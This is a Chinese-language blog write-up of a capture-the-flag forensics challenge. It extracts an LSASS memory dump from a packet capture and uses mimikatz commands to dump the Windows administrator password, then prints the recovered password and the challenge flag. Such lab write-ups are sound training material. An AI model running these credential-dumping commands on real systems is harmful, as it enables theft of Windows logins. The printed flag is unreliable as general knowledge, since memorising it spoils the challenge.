【BUUCTF】MISC [安洵杯 2019]Attack + mimikatz 获取 Administrator の Password

把数据包 foremost 一下

在这里插入图片描述在这里插入图片描述
在这里插入图片描述

导出对象http
在这里插入图片描述dmp文件搞出来!
在这里插入图片描述
是什么?为什么?怎么做?,人生三问。

lsass.exe是一个系统重要进程,用于微软Windows系统的安全机制。它用于本地安全和登陆策略。

https://github.com/gentilkiwi/mimikatz/

获取里面的系统administrator密码

没有一键三连的下场(下次一定的后果)

在这里插入图片描述

`mimikatz # privilege::debug
ERROR kuhl_m_privilege_simple ; RtlAdjustPrivilege (20) c0000061`

敲黑板!小本子记下来!!!

一定要右键管理员运行,切记,千万。
顺理成章

在这里插入图片描述
附上操作命令

privilege::debug
sekurlsa::minidump lsass.dmp
sekurlsa::logonpasswords full

得到压缩包密码

W3lc0meToD0g3

解压后的记事本

This is the secret of the administrator!


D0g3{3466b11de8894198af3636c5bd1efce2}

换成flag,done! Good job!

原创文章 61 获赞 106 访问量 1万+

猜你喜欢

转载自blog.csdn.net/vanarrow/article/details/106019306